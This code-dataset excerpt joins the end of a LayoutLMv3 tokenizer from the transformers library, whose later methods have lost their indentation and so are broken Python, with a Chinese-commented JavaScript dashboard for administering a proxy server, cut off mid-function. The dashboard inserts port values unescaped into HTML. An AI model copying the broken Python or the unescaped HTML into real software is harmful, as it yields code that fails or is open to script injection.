        return_special_tokens_mask: bool = False,
        return_offsets_mapping: bool = False,
        return_length: bool = False,
        verbose: bool = True,
    ) -> BatchEncoding:
        """
        Core batched encoding: run the backend fast tokenizer, then align the word-level bounding boxes (and
        optionally word labels) with the produced tokens.

        Every token gets a `bbox` entry: tokens belonging to a word get that word's box (question tokens in the
        pair case get the padding box), and special tokens get their dedicated boxes. When `word_labels` is given,
        a `labels` entry is built the same way, with `self.pad_token_label` on non-word tokens (and, if
        `only_label_first_subword`, on word-internal subword tokens).
        """
        if not isinstance(batch_text_or_text_pairs, list):
            raise TypeError(f"batch_text_or_text_pairs has to be a list (got {type(batch_text_or_text_pairs)})")
        # Set the truncation and padding strategy and restore the initial configuration
        self.set_truncation_and_padding(
            padding_strategy=padding_strategy,
            truncation_strategy=truncation_strategy,
            max_length=max_length,
            stride=stride,
            pad_to_multiple_of=pad_to_multiple_of,
        )
        if is_pair:
            # In the (question, words) case the question arrives as a plain string; split it on whitespace so the
            # backend tokenizer sees pretokenized input on both sides.
            batch_text_or_text_pairs = [(text.split(), text_pair) for text, text_pair in batch_text_or_text_pairs]
        encodings = self._tokenizer.encode_batch(
            batch_text_or_text_pairs,
            add_special_tokens=add_special_tokens,
            is_pretokenized=True,  # we set this to True as LayoutLMv3 always expects pretokenized inputs
        )
        # Convert encoding to dict
        # `Tokens` has type: Tuple[
        #                       List[Dict[str, List[List[int]]]] or List[Dict[str, 2D-Tensor]],
        #                       List[EncodingFast]
        #                    ]
        # with nested dimensions corresponding to batch, overflows, sequence length
        tokens_and_encodings = [
            self._convert_encoding(
                encoding=encoding,
                return_token_type_ids=return_token_type_ids,
                return_attention_mask=return_attention_mask,
                return_overflowing_tokens=return_overflowing_tokens,
                return_special_tokens_mask=return_special_tokens_mask,
                return_offsets_mapping=True
                if word_labels is not None
                else return_offsets_mapping,  # we use offsets to create the labels
                return_length=return_length,
                verbose=verbose,
            )
            for encoding in encodings
        ]
        # Convert the output to have dict[list] from list[dict] and remove the additional overflows dimension
        # From (variable) shape (batch, overflows, sequence length) to ~ (batch * overflows, sequence length)
        # (we say ~ because the number of overflow varies with the example in the batch)
        #
        # To match each overflowing sample with the original sample in the batch
        # we add an overflow_to_sample_mapping array (see below)
        sanitized_tokens = {}
        for key in tokens_and_encodings[0][0].keys():
            stack = [e for item, _ in tokens_and_encodings for e in item[key]]
            sanitized_tokens[key] = stack
        sanitized_encodings = [e for _, item in tokens_and_encodings for e in item]
        # If returning overflowing tokens, we need to return a mapping
        # from the batch idx to the original sample
        if return_overflowing_tokens:
            overflow_to_sample_mapping = []
            for i, (toks, _) in enumerate(tokens_and_encodings):
                overflow_to_sample_mapping += [i] * len(toks["input_ids"])
            sanitized_tokens["overflow_to_sample_mapping"] = overflow_to_sample_mapping
        for input_ids in sanitized_tokens["input_ids"]:
            self._eventual_warn_about_too_long_sequence(input_ids, max_length, verbose)
        # create the token boxes
        token_boxes = []
        for batch_index in range(len(sanitized_tokens["input_ids"])):
            # Overflow rows all point back at the original example's word-level boxes/labels.
            if return_overflowing_tokens:
                original_index = sanitized_tokens["overflow_to_sample_mapping"][batch_index]
            else:
                original_index = batch_index
            token_boxes_example = []
            for id, sequence_id, word_id in zip(
                sanitized_tokens["input_ids"][batch_index],
                sanitized_encodings[batch_index].sequence_ids,
                sanitized_encodings[batch_index].word_ids,
            ):
                if word_id is not None:
                    # In the pair case, sequence 0 is the question — question tokens carry the padding box.
                    if is_pair and sequence_id == 0:
                        token_boxes_example.append(self.pad_token_box)
                    else:
                        token_boxes_example.append(boxes[original_index][word_id])
                else:
                    # Special tokens get their dedicated boxes.
                    if id == self.cls_token_id:
                        token_boxes_example.append(self.cls_token_box)
                    elif id == self.sep_token_id:
                        token_boxes_example.append(self.sep_token_box)
                    elif id == self.pad_token_id:
                        token_boxes_example.append(self.pad_token_box)
                    else:
                        raise ValueError("Id not recognized")
            token_boxes.append(token_boxes_example)
        sanitized_tokens["bbox"] = token_boxes
        # optionally, create the labels
        if word_labels is not None:
            labels = []
            for batch_index in range(len(sanitized_tokens["input_ids"])):
                if return_overflowing_tokens:
                    original_index = sanitized_tokens["overflow_to_sample_mapping"][batch_index]
                else:
                    original_index = batch_index
                labels_example = []
                for id, offset, word_id in zip(
                    sanitized_tokens["input_ids"][batch_index],
                    sanitized_tokens["offset_mapping"][batch_index],
                    sanitized_encodings[batch_index].word_ids,
                ):
                    if word_id is not None:
                        if self.only_label_first_subword:
                            # offset[0] == 0 identifies the first subword token of a word.
                            if offset[0] == 0:
                                # Use the real label id for the first token of the word, and padding ids for the remaining tokens
                                labels_example.append(word_labels[original_index][word_id])
                            else:
                                labels_example.append(self.pad_token_label)
                        else:
                            labels_example.append(word_labels[original_index][word_id])
                    else:
                        labels_example.append(self.pad_token_label)
                labels.append(labels_example)
            sanitized_tokens["labels"] = labels
        # finally, remove offsets if the user didn't want them
        if not return_offsets_mapping:
            del sanitized_tokens["offset_mapping"]
        return BatchEncoding(sanitized_tokens, sanitized_encodings, tensor_type=return_tensors)
    # Copied from transformers.models.layoutlmv2.tokenization_layoutlmv2_fast.LayoutLMv2TokenizerFast._encode_plus
    def _encode_plus(
        self,
        text: Union[TextInput, PreTokenizedInput],
        text_pair: Optional[PreTokenizedInput] = None,
        boxes: Optional[List[List[int]]] = None,
        word_labels: Optional[List[int]] = None,
        add_special_tokens: bool = True,
        padding_strategy: PaddingStrategy = PaddingStrategy.DO_NOT_PAD,
        truncation_strategy: TruncationStrategy = TruncationStrategy.DO_NOT_TRUNCATE,
        max_length: Optional[int] = None,
        stride: int = 0,
        pad_to_multiple_of: Optional[int] = None,
        return_tensors: Optional[bool] = None,
        return_token_type_ids: Optional[bool] = None,
        return_attention_mask: Optional[bool] = None,
        return_overflowing_tokens: bool = False,
        return_special_tokens_mask: bool = False,
        return_offsets_mapping: bool = False,
        return_length: bool = False,
        verbose: bool = True,
        **kwargs,
    ) -> BatchEncoding:
        """
        Encode a single example by wrapping it into a batch of size one, delegating to `_batch_encode_plus`, and
        (unless tensors or overflowing tokens are requested) stripping the leading batch axis from the result.
        """
        # make it a batched input
        # 2 options:
        # 1) only text, in case text must be a list of str
        # 2) text + text_pair, in which case text = str and text_pair a list of str
        batched_input = [(text, text_pair)] if text_pair else [text]
        batched_boxes = [boxes]
        batched_word_labels = [word_labels] if word_labels is not None else None
        batched_output = self._batch_encode_plus(
            batched_input,
            is_pair=bool(text_pair is not None),
            boxes=batched_boxes,
            word_labels=batched_word_labels,
            add_special_tokens=add_special_tokens,
            padding_strategy=padding_strategy,
            truncation_strategy=truncation_strategy,
            max_length=max_length,
            stride=stride,
            pad_to_multiple_of=pad_to_multiple_of,
            return_tensors=return_tensors,
            return_token_type_ids=return_token_type_ids,
            return_attention_mask=return_attention_mask,
            return_overflowing_tokens=return_overflowing_tokens,
            return_special_tokens_mask=return_special_tokens_mask,
            return_offsets_mapping=return_offsets_mapping,
            return_length=return_length,
            verbose=verbose,
            **kwargs,
        )
        # Return tensor is None, then we can remove the leading batch axis
        # Overflowing tokens are returned as a batch of output so we keep them in this case
        if return_tensors is None and not return_overflowing_tokens:
            batched_output = BatchEncoding(
                {
                    key: value[0] if len(value) > 0 and isinstance(value[0], list) else value
                    for key, value in batched_output.items()
                },
                batched_output.encodings,
            )
        self._eventual_warn_about_too_long_sequence(batched_output["input_ids"], max_length, verbose)
        return batched_output
# Copied from transformers.models.layoutlmv2.tokenization_layoutlmv2_fast.LayoutLMv2TokenizerFast._pad
def _pad(
self,
encoded_inputs: Union[Dict[str, EncodedInput], BatchEncoding],
max_length: Optional[int] = None,
padding_strategy: PaddingStrategy = PaddingStrategy.DO_NOT_PAD,
pad_to_multiple_of: Optional[int] = None,
return_attention_mask: Optional[bool] = None,
) -> dict:
"""
Pad encoded inputs (on left/right and up to predefined length or max length in the batch)
Args:
encoded_inputs:
Dictionary of tokenized inputs (`List[int]`) or batch of tokenized inputs (`List[List[int]]`).
max_length: maximum length of the returned list and optionally padding length (see below).
Will truncate by taking into account the special tokens.
padding_strategy: PaddingStrategy to use for padding.
- PaddingStrategy.LONGEST Pad to the longest sequence in the batch
- PaddingStrategy.MAX_LENGTH: Pad to the max length (default)
- PaddingStrategy.DO_NOT_PAD: Do not pad
The tokenizer padding sides are defined in self.padding_side:
- 'left': pads on the left of the sequences
- 'right': pads on the right of the sequences
pad_to_multiple_of: (optional) Integer if set will pad the sequence to a multiple of the provided value.
This is especially useful to enable the use of Tensor Core on NVIDIA hardware with compute capability
`>= 7.5` (Volta).
return_attention_mask:
(optional) Set to False to avoid returning attention mask (default: set to model specifics)
"""
# Load from model defaults
if return_attention_mask is None:
return_attention_mask = "attention_mask" in self.model_input_names
required_input = encoded_inputs[self.model_input_names[0]]
if padding_strategy == PaddingStrategy.LONGEST:
max_length = len(required_input)
if max_length is not None and pad_to_multiple_of is not None and (max_length % pad_to_multiple_of != 0):
max_length = ((max_length // pad_to_multiple_of) + 1) * pad_to_multiple_of
needs_to_be_padded = padding_strategy != PaddingStrategy.DO_NOT_PAD and len(required_input) != max_length
# Initialize attention mask if not present.
if return_attention_mask and "attention_mask" not in encoded_inputs:
encoded_inputs["attention_mask"] = [1] * len(required_input)
if needs_to_be_padded:
difference = max_length - len(required_input)
if self.padding_side == "right":
if return_attention_mask:
encoded_inputs["attention_mask"] = encoded_inputs["attention_mask"] + [0] * difference
if "token_type_ids" in encoded_inputs:
encoded_inputs["token_type_ids"] = (
encoded_inputs["token_type_ids"] + [self.pad_token_type_id] * difference
)
if "bbox" in encoded_inputs:
encoded_inputs["bbox"] = encoded_inputs["bbox"] + [self.pad_token_box] * difference
if "labels" in encoded_inputs:
encoded_inputs["labels"] = encoded_inputs["labels"] + [self.pad_token_label] * difference
if "special_tokens_mask" in encoded_inputs:
encoded_inputs["special_tokens_mask"] = encoded_inputs["special_tokens_mask"] + [1] * difference
encoded_inputs[self.model_input_names[0]] = required_input + [self.pad_token_id] * difference
elif self.padding_side == "left":
if return_attention_mask:
encoded_inputs["attention_mask"] = [0] * difference + encoded_inputs["attention_mask"]
if "token_type_ids" in encoded_inputs:
encoded_inputs["token_type_ids"] = [self.pad_token_type_id] * difference + encoded_inputs[
"token_type_ids"
]
if "bbox" in encoded_inputs:
encoded_inputs["bbox"] = [self.pad_token_box] * difference + encoded_inputs["bbox"]
if "labels" in encoded_inputs:
encoded_inputs["labels"] = [self.pad_token_label] * difference + encoded_inputs["labels"]
if "special_tokens_mask" in encoded_inputs:
encoded_inputs["special_tokens_mask"] = [1] * difference + encoded_inputs["special_tokens_mask"]
encoded_inputs[self.model_input_names[0]] = [self.pad_token_id] * difference + required_input
else:
raise ValueError("Invalid padding strategy:" + str(self.padding_side))
return encoded_inputs
# Copied from transformers.models.layoutlmv2.tokenization_layoutlmv2_fast.LayoutLMv2TokenizerFast.save_vocabulary
def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str] = None) -> Tuple[str]:
files = self._tokenizer.model.save(save_directory, name=filename_prefix)
return tuple(files)
def build_inputs_with_special_tokens(self, token_ids_0, token_ids_1=None):
output = [self.bos_token_id] + token_ids_0 + [self.eos_token_id]
if token_ids_1 is None:
return output
return output + [self.eos_token_id] + token_ids_1 + [self.eos_token_id]
def create_token_type_ids_from_sequences(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
"""
Args:
Create a mask from the two sequences passed to be used in a sequence-pair classification task. RoBERTa does not:
make use of token type ids, therefore a list of zeros is returned.
token_ids_0 (`List[int]`):
List of IDs.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
Returns:
`List[int]`: List of zeros.
"""
sep = [self.sep_token_id]
cls = [self.cls_token_id]
if token_ids_1 is None:
return len(cls + token_ids_0 + sep) * [0]
return len(cls + token_ids_0 + sep + sep + token_ids_1 + sep) * [0]
|
2833844911/cyTlsXhr | 42,478 | static/js/dashboard.js | document.addEventListener('DOMContentLoaded', function() {
// 检查登录状态
if (!localStorage.getItem('token')) {
window.location.href = '/';
return;
}
// 获取DOM元素
const logoutBtn = document.getElementById('logout-btn');
const navItems = document.querySelectorAll('.nav-menu li');
const panels = document.querySelectorAll('.panel');
const startProxyBtn = document.getElementById('start-proxy');
const stopProxyBtn = document.getElementById('stop-proxy');
const addUserForm = document.getElementById('add-user-form');
const settingsForm = document.getElementById('settings-form');
const resetStatsBtn = document.getElementById('reset-stats');
const addPortForm = document.getElementById('add-port-form');
const portsList = document.getElementById('ports-list');
// 初始化页面
updateProxyStatus();
loadUsers();
loadSettings();
loadStats();
loadProxyPorts();
// 设置定时刷新
setInterval(updateProxyStatus, 5000);
setInterval(loadStats, 10000);
setInterval(loadProxyPorts, 5000);
// 监听无需认证复选框变化
document.getElementById('no-auth-user').addEventListener('change', function() {
const passwordInput = document.getElementById('new-password');
if (this.checked) {
passwordInput.disabled = true;
passwordInput.required = false;
passwordInput.value = '';
} else {
passwordInput.disabled = false;
passwordInput.required = true;
}
});
// 监听代理转发复选框变化
document.getElementById('use-forward-proxy').addEventListener('change', function() {
const remoteProxySettings = document.getElementById('remote-proxy-settings');
if (this.checked) {
remoteProxySettings.style.display = 'block';
} else {
remoteProxySettings.style.display = 'none';
}
});
// 处理导航菜单点击
navItems.forEach(item => {
item.addEventListener('click', function() {
const tabId = this.getAttribute('data-tab');
// 更新活动标签
navItems.forEach(nav => nav.classList.remove('active'));
this.classList.add('active');
// 显示对应面板
panels.forEach(panel => {
if (panel.id === tabId + '-panel') {
panel.classList.add('active');
} else {
panel.classList.remove('active');
}
});
});
});
// 处理退出登录
logoutBtn.addEventListener('click', function() {
localStorage.removeItem('token');
window.location.href = '/';
});
// 处理启动代理服务器
startProxyBtn.addEventListener('click', function() {
fetch('/api/proxy/start', {
method: 'POST',
headers: {
'Authorization': 'Bearer ' + localStorage.getItem('token')
}
})
.then(response => response.json())
.then(data => {
if (data.success) {
updateProxyStatus();
} else {
alert('启动服务失败: ' + data.message);
}
})
.catch(error => {
console.error('启动服务请求失败:', error);
alert('启动服务请求失败,请稍后重试');
});
});
// 处理停止代理服务器
stopProxyBtn.addEventListener('click', function() {
fetch('/api/proxy/stop', {
method: 'POST',
headers: {
'Authorization': 'Bearer ' + localStorage.getItem('token')
}
})
.then(response => response.json())
.then(data => {
if (data.success) {
updateProxyStatus();
} else {
alert('停止服务失败: ' + data.message);
}
})
.catch(error => {
console.error('停止服务请求失败:', error);
alert('停止服务请求失败,请稍后重试');
});
});
// 处理添加用户
addUserForm.addEventListener('submit', function(e) {
e.preventDefault();
const username = document.getElementById('new-username').value;
const password = document.getElementById('new-password').value;
const noAuth = document.getElementById('no-auth-user').checked;
// 如果选择了"无需认证"但未填写用户名,则提示错误
if (noAuth && !username.trim()) {
alert('即使是无需认证的用户,也需要设置一个用户名作为标识');
return;
}
// 如果未选择"无需认证",但未填写密码,则提示错误
if (!noAuth && !password.trim()) {
alert('请输入用户密码');
return;
}
fetch('/api/users', {
method: 'POST',
headers: {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + localStorage.getItem('token')
},
body: JSON.stringify({
username: username,
password: noAuth ? "" : password,
no_auth: noAuth
})
})
.then(response => response.json())
.then(data => {
if (data.success) {
// 重置表单
addUserForm.reset();
// 刷新用户列表
loadUsers();
} else {
alert('添加用户失败: ' + data.message);
}
})
.catch(error => {
console.error('添加用户请求失败:', error);
alert('添加用户请求失败,请稍后重试');
});
});
// 处理添加代理端口
addPortForm.addEventListener('submit', function(e) {
e.preventDefault();
const listenAddr = document.getElementById('new-port-addr').value;
const allowAnonymous = document.getElementById('new-port-anonymous').checked;
// 验证监听地址
if (!listenAddr.trim()) {
alert('监听地址不能为空');
return;
}
fetch('/api/proxy/ports', {
method: 'POST',
headers: {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + localStorage.getItem('token')
},
body: JSON.stringify({
listen_addr: listenAddr,
allow_anonymous: allowAnonymous
})
})
.then(response => response.json())
.then(data => {
if (data.success) {
// 重置表单
addPortForm.reset();
// 刷新端口列表
loadProxyPorts();
} else {
alert('添加代理端口失败: ' + data.message);
}
})
.catch(error => {
console.error('添加代理端口请求失败:', error);
alert('添加代理端口请求失败,请稍后重试');
});
});
// 处理保存设置
settingsForm.addEventListener('submit', function(e) {
e.preventDefault();
const proxyPort = document.getElementById('proxy-port').value;
const webPort = document.getElementById('web-port').value;
const adminUsername = document.getElementById('admin-username').value;
const adminPassword = document.getElementById('admin-password').value;
const useForwardProxy = document.getElementById('use-forward-proxy').checked;
const allowAnonymous = document.getElementById('allow-anonymous').checked;
const remoteProxyAddr = document.getElementById('remote-proxy-addr').value;
const remoteProxyUser = document.getElementById('remote-proxy-user').value;
const remoteProxyPass = document.getElementById('remote-proxy-pass').value;
// 如果启用转发代理但未填写代理地址,显示提示
if (useForwardProxy && !remoteProxyAddr) {
alert('启用代理转发时,远程代理地址不能为空');
return;
}
fetch('/api/settings', {
method: 'POST',
headers: {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + localStorage.getItem('token')
},
body: JSON.stringify({
proxy_port: proxyPort,
web_port: webPort,
admin_username: adminUsername,
admin_password: adminPassword,
use_forward_proxy: useForwardProxy,
allow_anonymous: allowAnonymous,
remote_proxy_addr: remoteProxyAddr,
remote_proxy_user: remoteProxyUser,
remote_proxy_pass: remoteProxyPass
})
})
.then(response => response.json())
.then(data => {
if (data.success) {
alert('设置已保存');
// 刷新设置
loadSettings();
// 刷新代理状态
updateProxyStatus();
// 刷新端口列表
loadProxyPorts();
} else {
alert('保存设置失败: ' + data.message);
}
})
.catch(error => {
console.error('保存设置请求失败:', error);
alert('保存设置请求失败,请稍后重试');
});
});
// 处理重置统计
resetStatsBtn.addEventListener('click', function() {
if (confirm('确定要重置所有统计数据吗?')) {
fetch('/api/stats/reset', {
method: 'POST',
headers: {
'Authorization': 'Bearer ' + localStorage.getItem('token')
}
})
.then(response => response.json())
.then(data => {
if (data.success) {
loadStats();
} else {
alert('重置统计失败: ' + data.message);
}
})
.catch(error => {
console.error('重置统计请求失败:', error);
alert('重置统计请求失败,请稍后重试');
});
}
});
// 更新代理状态
function updateProxyStatus() {
fetch('/api/proxy/status', {
headers: {
'Authorization': 'Bearer ' + localStorage.getItem('token')
}
})
.then(response => response.json())
.then(data => {
if (data.success) {
const status = data.data;
const statusElement = document.getElementById('proxy-status');
const addressElement = document.getElementById('proxy-address');
const startTimeElement = document.getElementById('start-time');
const connectionCountElement = document.getElementById('connection-count');
// 更新状态显示
statusElement.textContent = status.running ? '运行中' : '已停止';
statusElement.className = 'value status-indicator ' + (status.running ? 'running' : 'stopped');
addressElement.textContent = status.address;
if (status.running) {
startTimeElement.textContent = new Date(status.start_time).toLocaleString();
connectionCountElement.textContent = status.connection_count;
// 更新按钮状态
startProxyBtn.disabled = true;
stopProxyBtn.disabled = false;
} else {
startTimeElement.textContent = '-';
connectionCountElement.textContent = '0';
// 更新按钮状态
startProxyBtn.disabled = false;
stopProxyBtn.disabled = true;
}
}
})
.catch(error => {
console.error('获取代理状态失败:', error);
});
}
// 加载用户列表
function loadUsers() {
fetch('/api/users', {
headers: {
'Authorization': 'Bearer ' + localStorage.getItem('token')
}
})
.then(response => response.json())
.then(data => {
if (data.success) {
const userList = document.getElementById('user-list');
userList.innerHTML = '';
data.data.forEach(user => {
const row = document.createElement('tr');
const usernameCell = document.createElement('td');
usernameCell.textContent = user.username;
const passwordCell = document.createElement('td');
passwordCell.textContent = user.no_auth ? '无需认证' : '••••••••';
const actionCell = document.createElement('td');
const deleteBtn = document.createElement('button');
deleteBtn.textContent = '删除';
deleteBtn.className = 'btn-delete';
deleteBtn.addEventListener('click', function() {
deleteUser(user.username);
});
actionCell.appendChild(deleteBtn);
row.appendChild(usernameCell);
row.appendChild(passwordCell);
row.appendChild(actionCell);
userList.appendChild(row);
});
}
})
.catch(error => {
console.error('获取用户列表失败:', error);
});
}
// 删除用户
function deleteUser(username) {
if (confirm(`确定要删除用户 "${username}" 吗?`)) {
fetch(`/api/users/${username}`, {
method: 'DELETE',
headers: {
'Authorization': 'Bearer ' + localStorage.getItem('token')
}
})
.then(response => response.json())
.then(data => {
if (data.success) {
loadUsers();
} else {
alert('删除用户失败: ' + data.message);
}
})
.catch(error => {
console.error('删除用户请求失败:', error);
alert('删除用户请求失败,请稍后重试');
});
}
}
// 加载设置
function loadSettings() {
fetch('/api/settings', {
headers: {
'Authorization': 'Bearer ' + localStorage.getItem('token')
}
})
.then(response => response.json())
.then(data => {
if (data.success) {
const settings = data.data;
document.getElementById('proxy-port').value = settings.proxy_port;
document.getElementById('web-port').value = settings.web_port;
document.getElementById('admin-username').value = settings.admin_username;
document.getElementById('use-forward-proxy').checked = settings.use_forward_proxy || false;
document.getElementById('allow-anonymous').checked = settings.allow_anonymous || false;
// 设置远程代理信息
if (settings.remote_proxy_addr) {
document.getElementById('remote-proxy-addr').value = settings.remote_proxy_addr;
}
if (settings.remote_proxy_user) {
document.getElementById('remote-proxy-user').value = settings.remote_proxy_user;
}
// 显示/隐藏远程代理设置区域
const remoteProxySettings = document.getElementById('remote-proxy-settings');
remoteProxySettings.style.display = settings.use_forward_proxy ? 'block' : 'none';
}
})
.catch(error => {
console.error('获取设置失败:', error);
});
}
// 加载统计信息
function loadStats() {
fetch('/api/stats', {
headers: {
'Authorization': 'Bearer ' + localStorage.getItem('token')
}
})
.then(response => response.json())
.then(data => {
if (data.success) {
const stats = data.data;
// 更新总请求数
document.getElementById('total-requests').textContent = stats.total_requests;
// 更新域名统计
const domainStatsElement = document.getElementById('domain-stats');
domainStatsElement.innerHTML = '';
if (stats.domain_stats.length === 0) {
const row = document.createElement('tr');
const cell = document.createElement('td');
cell.colSpan = 3;
cell.textContent = '暂无数据';
cell.style.textAlign = 'center';
row.appendChild(cell);
domainStatsElement.appendChild(row);
} else {
stats.domain_stats.forEach(domain => {
const row = document.createElement('tr');
const domainCell = document.createElement('td');
domainCell.textContent = domain.domain;
const countCell = document.createElement('td');
countCell.textContent = domain.count;
const lastVisitCell = document.createElement('td');
lastVisitCell.textContent = new Date(domain.last_visit).toLocaleString();
row.appendChild(domainCell);
row.appendChild(countCell);
row.appendChild(lastVisitCell);
domainStatsElement.appendChild(row);
});
}
}
})
.catch(error => {
console.error('获取统计信息失败:', error);
});
}
// 加载代理端口列表
function loadProxyPorts() {
fetch('/api/proxy/ports', {
headers: {
'Authorization': 'Bearer ' + localStorage.getItem('token')
}
})
.then(response => response.json())
.then(data => {
if (data.success) {
const portsList = document.getElementById('ports-list');
portsList.innerHTML = '';
data.data.forEach(port => {
const row = document.createElement('tr');
const addrCell = document.createElement('td');
addrCell.textContent = port.listen_addr;
const statusCell = document.createElement('td');
const statusIndicator = document.createElement('span');
statusIndicator.className = 'status-indicator ' + (port.running ? 'running' : 'stopped');
statusIndicator.textContent = port.running ? '运行中' : '已停止';
statusCell.appendChild(statusIndicator);
const connCell = document.createElement('td');
connCell.textContent = port.connection_count || 0;
const actionCell = document.createElement('td');
// 启动/停止按钮
const toggleBtn = document.createElement('button');
toggleBtn.className = 'btn-action ' + (port.running ? 'btn-stop' : 'btn-start');
toggleBtn.textContent = port.running ? '停止' : '启动';
toggleBtn.addEventListener('click', function() {
if (port.running) {
stopProxyPort(port.id);
} else {
startProxyPort(port.id);
}
});
// 编辑按钮
const editBtn = document.createElement('button');
editBtn.className = 'btn-edit';
editBtn.textContent = '编辑';
editBtn.addEventListener('click', function() {
// 确保传递running状态
port.running = port.running;
editProxyPort(port);
});
// 删除按钮
const deleteBtn = document.createElement('button');
deleteBtn.className = 'btn-delete';
deleteBtn.textContent = '删除';
deleteBtn.addEventListener('click', function() {
deleteProxyPort(port.id);
});
actionCell.appendChild(toggleBtn);
actionCell.appendChild(editBtn);
actionCell.appendChild(deleteBtn);
row.appendChild(addrCell);
row.appendChild(statusCell);
row.appendChild(connCell);
row.appendChild(actionCell);
portsList.appendChild(row);
});
}
})
.catch(error => {
console.error('获取代理端口列表失败:', error);
});
}
// 启动代理端口
function startProxyPort(id) {
fetch(`/api/proxy/ports/${id}/start`, {
method: 'POST',
headers: {
'Authorization': 'Bearer ' + localStorage.getItem('token')
}
})
.then(response => response.json())
.then(data => {
if (data.success) {
loadProxyPorts();
} else {
alert('启动代理端口失败: ' + data.message);
}
})
.catch(error => {
console.error('启动代理端口请求失败:', error);
alert('启动代理端口请求失败,请稍后重试');
});
}
// 停止代理端口
function stopProxyPort(id) {
fetch(`/api/proxy/ports/${id}/stop`, {
method: 'POST',
headers: {
'Authorization': 'Bearer ' + localStorage.getItem('token')
}
})
.then(response => response.json())
.then(data => {
if (data.success) {
loadProxyPorts();
} else {
alert('停止代理端口失败: ' + data.message);
}
})
.catch(error => {
console.error('停止代理端口请求失败:', error);
alert('停止代理端口请求失败,请稍后重试');
});
}
// 编辑代理端口
function editProxyPort(port) {
// 创建编辑对话框
const dialogHTML = `
<div class="modal-overlay port-detail-modal" id="edit-port-modal">
<div class="modal-content">
<h3>管理代理端口 - ${port.listen_addr}</h3>
<div class="port-detail-tabs">
<div class="port-detail-tab active" data-tab="basic">基本设置</div>
<div class="port-detail-tab" data-tab="users">用户管理</div>
<div class="port-detail-tab" data-tab="forward">代理转发</div>
</div>
<div class="port-detail-panel active" id="basic-panel">
<div class="port-info">
<div class="port-info-item">
<div class="port-info-label">端口ID:</div>
<div class="port-info-value">${port.id}</div>
</div>
<div class="port-info-item">
<div class="port-info-label">连接数:</div>
<div class="port-info-value">${port.status ? port.status.connection_count : 0}</div>
</div>
</div>
<form id="edit-port-basic-form" onsubmit="return false;">
<input type="hidden" id="port-id" value="${port.id}">
<div class="form-group">
<label for="edit-port-addr">监听地址 (格式: IP:端口)</label>
<input type="text" id="edit-port-addr" name="listen_addr" value="${port.listen_addr}" required ${port.running ? 'disabled' : ''}>
${port.running ? '<p class="form-hint">代理服务运行中,无法修改监听地址。请先停止代理服务。</p>' : ''}
</div>
<div class="form-group checkbox-group">
<input type="checkbox" id="edit-port-enabled" name="enabled" ${port.enabled ? 'checked' : ''}>
<label for="edit-port-enabled">启用</label>
</div>
<div class="form-group checkbox-group">
<input type="checkbox" id="edit-port-anonymous" name="allow_anonymous" ${port.allow_anonymous ? 'checked' : ''}>
<label for="edit-port-anonymous">允许匿名访问 (不需要账号密码)</label>
</div>
<button type="button" id="save-port-basic" class="btn-save">保存基本设置</button>
</form>
</div>
<div class="port-detail-panel" id="users-panel">
<h4>端口专用用户</h4>
<p>您可以为此端口添加专用的用户账号,这些账号只能通过此端口访问代理服务。</p>
<table class="port-users-table">
<thead>
<tr>
<th>用户名</th>
<th>密码</th>
<th>操作</th>
</tr>
</thead>
<tbody id="port-users-list">
<!-- 用户列表将通过JavaScript动态生成 -->
</tbody>
</table>
<form id="add-port-user-form" onsubmit="return false;">
<input type="hidden" id="port-id" value="${port.id}">
<h4>添加专用用户</h4>
<div class="form-group">
<label for="port-new-username">用户名</label>
<input type="text" id="port-new-username" name="username" required>
</div>
<div class="form-group">
<label for="port-new-password">密码</label>
<input type="password" id="port-new-password" name="password" required>
</div>
<div class="form-group checkbox-group">
<input type="checkbox" id="port-no-auth-user" name="no_auth">
<label for="port-no-auth-user">无需认证的用户(不需要账号密码)</label>
</div>
<button type="button" id="add-port-user-btn" class="btn-add">添加用户</button>
</form>
</div>
<div class="port-detail-panel" id="forward-panel">
<h4>代理转发设置</h4>
<p>您可以将此端口的请求转发到另一个代理服务器。${port.running ? '<strong>注意:修改设置后,代理服务将自动重启以应用新设置。</strong>' : ''}</p>
<form id="edit-port-forward-form" onsubmit="return false;">
<input type="hidden" id="port-id-forward" value="${port.id}">
<div class="form-group checkbox-group">
<input type="checkbox" id="port-use-forward-proxy" name="use_forward_proxy">
<label for="port-use-forward-proxy">启用代理转发</label>
</div>
<div id="port-forward-settings" class="disabled">
<div class="form-group">
<label for="port-remote-proxy-addr">远程代理地址 (格式: IP:端口)</label>
<input type="text" id="port-remote-proxy-addr" name="remote_proxy_addr" placeholder="例如: 160.20.18.17:3989">
</div>
<div class="form-group">
<label for="port-remote-proxy-user">远程代理用户名</label>
<input type="text" id="port-remote-proxy-user" name="remote_proxy_user" placeholder="例如: admin">
</div>
<div class="form-group">
<label for="port-remote-proxy-pass">远程代理密码</label>
<input type="password" id="port-remote-proxy-pass" name="remote_proxy_pass" placeholder="输入远程代理密码">
</div>
</div>
<button type="button" id="save-port-forward" class="btn-save">保存转发设置</button>
</form>
</div>
<div class="modal-actions">
<button class="btn-cancel" id="close-port-modal">关闭</button>
</div>
</div>
</div>
`;
// 添加对话框到DOM
document.body.insertAdjacentHTML('beforeend', dialogHTML);
// 监听代理转发复选框变化
document.getElementById('port-use-forward-proxy').addEventListener('change', function() {
const forwardSettings = document.getElementById('port-forward-settings');
if (this.checked) {
forwardSettings.classList.remove('disabled');
} else {
forwardSettings.classList.add('disabled');
}
});
// 处理关闭按钮
document.getElementById('close-port-modal').addEventListener('click', function() {
const modal = document.getElementById('edit-port-modal');
modal.remove();
});
// 处理标签切换
const tabs = document.querySelectorAll('.port-detail-tab');
const panels = document.querySelectorAll('.port-detail-panel');
tabs.forEach(tab => {
tab.addEventListener('click', function() {
const tabId = this.getAttribute('data-tab');
// 更新活动标签
tabs.forEach(t => t.classList.remove('active'));
this.classList.add('active');
// 显示对应面板
panels.forEach(panel => {
if (panel.id === tabId + '-panel') {
panel.classList.add('active');
} else {
panel.classList.remove('active');
}
});
// 如果切换到代理转发选项卡,加载转发设置
if (tabId === 'forward') {
loadPortForwardSettings(port.id);
}
});
});
// 处理添加用户按钮点击
document.getElementById('add-port-user-btn').addEventListener('click', function() {
const portId = port.id;
const username = document.getElementById('port-new-username').value;
const password = document.getElementById('port-new-password').value;
